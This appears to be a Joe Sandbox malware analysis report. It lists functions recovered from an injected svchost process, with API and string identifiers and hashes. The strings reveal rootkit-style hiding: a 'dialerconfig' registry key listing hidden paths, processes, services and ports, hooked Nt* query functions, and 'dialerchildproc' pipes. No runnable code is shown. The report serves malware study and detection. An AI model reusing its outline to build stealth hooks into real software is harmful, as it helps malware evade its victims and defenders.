                                            • Executed
                                            • Not Executed
                                            control_flow_graph 204 17953d41650-17953d416e2 GetProcessHeap call 17953d53170 call 17953d41274 call 17953d41000 call 17953d41274 * 3 call 17953d41000 * 3 RegOpenKeyExW 223 17953d418ce-17953d418d8 204->223 224 17953d416e8-17953d4170f RegOpenKeyExW 204->224 225 17953d41727-17953d41749 RegOpenKeyExW 224->225 226 17953d41711-17953d41715 224->226 228 17953d4174b-17953d4174f 225->228 229 17953d41762-17953d41784 RegOpenKeyExW 225->229 227 17953d41718 call 17953d412c8 226->227 230 17953d4171d-17953d41721 RegCloseKey 227->230 231 17953d41753 call 17953d4104c 228->231 232 17953d4179d-17953d417bf RegOpenKeyExW 229->232 233 17953d41786-17953d4178a 229->233 230->225 234 17953d41758-17953d4175c RegCloseKey 231->234 236 17953d417d8-17953d417fa RegOpenKeyExW 232->236 237 17953d417c1-17953d417c5 232->237 235 17953d4178e call 17953d412c8 233->235 234->229 240 17953d41793-17953d41797 RegCloseKey 235->240 238 17953d417fc-17953d41800 236->238 239 17953d41813-17953d41835 RegOpenKeyExW 236->239 241 17953d417c9 call 17953d412c8 237->241 242 17953d41804 call 17953d412c8 238->242 243 17953d4184e-17953d41870 RegOpenKeyExW 239->243 244 17953d41837-17953d4183b 239->244 240->232 245 17953d417ce-17953d417d2 RegCloseKey 241->245 246 17953d41809-17953d4180d RegCloseKey 242->246 248 17953d41889-17953d418ab RegOpenKeyExW 243->248 249 17953d41872-17953d41876 243->249 247 17953d4183f call 17953d4104c 244->247 245->236 246->239 250 17953d41844-17953d41848 RegCloseKey 247->250 252 17953d418ad-17953d418b1 248->252 253 17953d418c4-17953d418c8 RegCloseKey 248->253 251 17953d4187a call 17953d4104c 249->251 250->243 254 17953d4187f-17953d41883 RegCloseKey 251->254 255 17953d418b5 call 17953d4104c 252->255 253->223 254->248 256 17953d418ba-17953d418be RegCloseKey 255->256 256->253
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 106492572-2879589442
                                            • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction ID: 71312e77df608c7ffac4e76f1603aefdbc2ca8ceb81599fa74447b51014c12ec
                                            • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction Fuzzy Hash: 38710836314B6086EB129F66E8907D927F4FB88B8DF405112DE4D97B28EF78C558C700

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction ID: 242f178902969ed05e7db39c4f9884770abd5e876cc59087611c71ca94d681af
                                            • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction Fuzzy Hash: D651A072A18B5493FB11CFA6E45439AB3B5F78AB88F448126DB4D47B14EF38D499CB00

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction ID: ec305540d5351e85b1c7146019941ee1ba0fc960e6281679760cb06f6ee96119
                                            • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction Fuzzy Hash: 4D515A72618B5493EB16DFA2F54879AB3B1F788B88F048126DE9D07B14DF78C069C700

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread$AddressHandleModuleProc
                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                            • API String ID: 4175298099-1975688563
                                            • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction ID: f26b529a3a280a1e3bc0626f675bd49583e0889ff9157c4ab1e27ec038f586aa
                                            • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction Fuzzy Hash: FE31B270E29A6AA0FB47FF64E8616D42371B74634CFC05423E91E13765AE38C68DCB90

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread$AddressHandleModuleProc
                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                            • API String ID: 4175298099-1975688563
                                            • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction ID: e0670c5afb079ca168297aa4a043527467c165bc8ce63d54b4a0a75049b55e22
                                            • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction Fuzzy Hash: A73192B0218A7AA1FB17EFA5E8516E423B1BB9438CFC05513A51D13966DFBCC64DC780
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                            • API String ID: 2171963597-1373409510
                                            • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction ID: 7ee9d80e101d04651c30a2cd6f7255030bf4b4242cf91b5e4f1f18af3282e3a0
                                            • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction Fuzzy Hash: 25214F36A1CB5493F7119B65F45439A73B1F78ABA8F504216EA9D02BA8DF3CC58DCB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                            • API String ID: 2171963597-1373409510
                                            • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction ID: 20ff23a6c584c0ddb20fd73cb4a68275a69abc2f68d636e31bf4ae53be9b85fd
                                            • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction Fuzzy Hash: F3211A36618B6083EB119B65F54439A67B0F789BA8F504216EA9D07FA8DF7CC15DCB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction ID: d3e5ddb8c7ea47e145821f6ccb884b43ef8b81797d3f302e12167a070b06dd6f
                                            • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction Fuzzy Hash: 56419133618B9097E761CF52E4443DAB7B1F389B88F408126EB8907B54EF38D1A8CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction ID: 43356fa826101fb385b1a2c84415f541f4fce1ea23c048e743393c20f25d9e34
                                            • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction Fuzzy Hash: 62416D73618B9097E7658F62E4447DAB7B1F389B88F00812ADB8907B58DF78D56DCB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: fe0b3c69a772beff74a310c280af15da20169bff3b51c378fc6cd5bad66cdd7b
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: F181A231F2C2E186F6579BE998513E963F2AB4778CF0840A7990DC7796EA38C94D8710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2966408858.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953770000_svchost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: 60b4277ef502123304cdda403c19c92aaea76ebe1c7de292c57dba5dee19c896
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: 0081D431F1C2A186FA57AB2698413D9A7F0EB8778CF544527DA0D8779ADB38C84E8704
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: 662996d2083bf6fd62e3e0765b4ba47f2ed88007cb6559608672a045c510e3df
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: 1B81A231B0C36186FBD39B69A8413D923F1B79578CF584427AA2DC7B96DBB8C84D8710
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction ID: fb00aff284e09e6af16075ed21140bb303b4032a6c08bac2c3ba20d5d6053718
                                            • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction Fuzzy Hash: B731A531A2AB68A1FE179B06A8107DD63B4FB4BBA8F190526DD6D47384EF38C45D8300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction ID: b1a9df5a77c28b3842d60e42d2a6d64dad16561cf8296d9081ebfd5272c7df59
                                            • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction Fuzzy Hash: EF31A13221ABA091EF179B17A8007D963F4BB08BA8F194526ED6D4B780EF78C44D8300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction ID: 4dd854cc27738fee971dc4d248d953faf7b5b467519e62f606b3a150afd8830f
                                            • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction Fuzzy Hash: 3D11BF31B18B6486F7528B42E86439973B4F78AFE8F000226EA5D87794EF3CC9488740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction ID: c547da781cfa8c5f9133cafa5bf72de5d446ee9970be24b3e481ebb3e5fd2a63
                                            • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                            • Instruction Fuzzy Hash: FD119D32318B6086E7529B56F854799B3F0F398FE8F000226EE5D87B94DF78C9588740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction ID: de58720446573f38df410790958115264cac2ca19ba3ca045ca26aac2ae5ccaf
                                            • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction Fuzzy Hash: 14D1997661DB98C2DA719B1AE49439AB7B0F389B98F100216EACD47BA5DF3CC545CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction ID: 5c3593c5b5a5305e3b7e09e44a91fb22c5de2862b488beb9c3ad4838d7f49401
                                            • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                            • Instruction Fuzzy Hash: B1D1B976208B9882DB71DB1AE49439A77B1F7C8B88F100116EACD47BA5DFBCC555CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: dialer
                                            • API String ID: 756756679-3528709123
                                            • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction ID: bb244d26d202178e2e698a051b50a56d7156bf69fd7b977937b4bd25da37fbb8
                                            • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction Fuzzy Hash: B4319331B19F6592FB56DF96E8446E963B0FB46B88F0440269E4C07F54FF38D4A98700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: dialer
                                            • API String ID: 756756679-3528709123
                                            • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction ID: bc490cab6f10554e7cc4f6725225c48185fb81c17ba62f82f24fd0007ef811e1
                                            • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                            • Instruction Fuzzy Hash: 65318131709B7592EB56DF9AA8447E963B0FB54B88F0881229E4D07B54EF78C4BDC700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction ID: 6c9f91e3a03382234b65fbc9f7c05ce95aea04b3e0e994b99970f10821bfc3a6
                                            • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction Fuzzy Hash: A2016D31B08A5596FB11DB52A8A839963B5F789FC8F884036DE8D43754EF3CC9C98700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction ID: 62a0d3b532f12bedb06b8585014677500c4d1457d2df2cc89a8cafbcac868ed1
                                            • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                            • Instruction Fuzzy Hash: 03011731708B5196EB16DB62B85879963B1F788FC8F488436DE8D43B54DF78C98E8740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction ID: 328bcb0f3b657e4e7b0b0eb2427655a71625d9a7eea54b0913c3979adf7372be
                                            • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction Fuzzy Hash: EC116D74A19B6486FB229B61F82979663B4FB4AB89F040426CD4D07B54FF3CC04CC710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction ID: 98e0fb8ffe8b08277a3141cfd9b2ab10b17c21a80a57894efa2c2e7251c3fd23
                                            • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                            • Instruction Fuzzy Hash: FE112D7561976082FB269F65F409796A7F0BB58B89F040426DD4D47B54EF3CC41CC700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 2395640692-629598281
                                            • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                            • Instruction ID: f82fcae40f8ce00a7f6b31fa9e414c03d589631d3bbd82575b9de048900d0754
                                            • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                            • Instruction Fuzzy Hash: 5651D3323196209BEB56CF26E484B9937B5F344B8CF948122EE5E47748DBB5CD49C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 2395640692-629598281
                                            • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction ID: 9468f93ce32db143040ae69ef994ffd20732e21772612c9d05215ff005760186
                                            • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction Fuzzy Hash: A251A132B296288AEB96CB15E444BDD33B5F347B9CF508122DA0E47B88EB35DC59C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 2395640692-629598281
                                            • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction ID: a9a055084eb90fbab25c282e8fff424a4fc1c979f75e7898b94f3ca87daab5c5
                                            • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction Fuzzy Hash: C931E032A2966496E712DF21E848B9D37B5F747B8CF048116EE4E03B84EB38C958C704
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction ID: 8ef73a6d17c5181fc26fe53d14bc71b85ee070806e4b74a87cb371eb949d1953
                                            • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction Fuzzy Hash: 0CF0447271869592F7619B65F4E43D96771F745B8CF848022CA8D47664EF3CC68CCB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction ID: e0bfd5b1c7735f84651dc4fa5ed51da96056f857026c4493821910d27f5a1d96
                                            • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                            • Instruction Fuzzy Hash: E2F04F7230866192EB228BA5F49939A67B0F754B8CF848022CA8D47A54DF6CC68CCB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction ID: c83c9d28c704160dc0fe5e41b9c2bf0097c43b62eeb3fda8efb59c4134b346ee
